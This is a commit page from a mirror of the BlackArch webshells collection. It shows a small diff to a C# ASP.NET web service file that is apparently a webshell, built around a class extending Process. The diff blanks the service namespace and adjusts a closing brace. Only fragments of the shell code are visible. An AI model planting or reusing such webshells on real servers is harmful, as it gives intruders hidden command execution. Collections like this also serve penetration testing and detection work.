mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
Update
This commit is contained in:
parent
be43efc9ac
commit
186312af8c
1 changed files with 2 additions and 2 deletions
|
@ -31,7 +31,7 @@ using System.Web.Services;
|
|||
using System.Xml;
|
||||
using System.Web.Services.Protocols;
|
||||
|
||||
[WebService(Namespace = "http://www.payloads.online/")]
|
||||
[WebService(Namespace = "")]
|
||||
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
|
||||
|
||||
public class New_Process :Process
|
||||
|
@ -81,4 +81,4 @@ public class Service : System.Web.Services.WebService
|
|||
HttpContext.Current.Response.End();
|
||||
return R;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in a new issue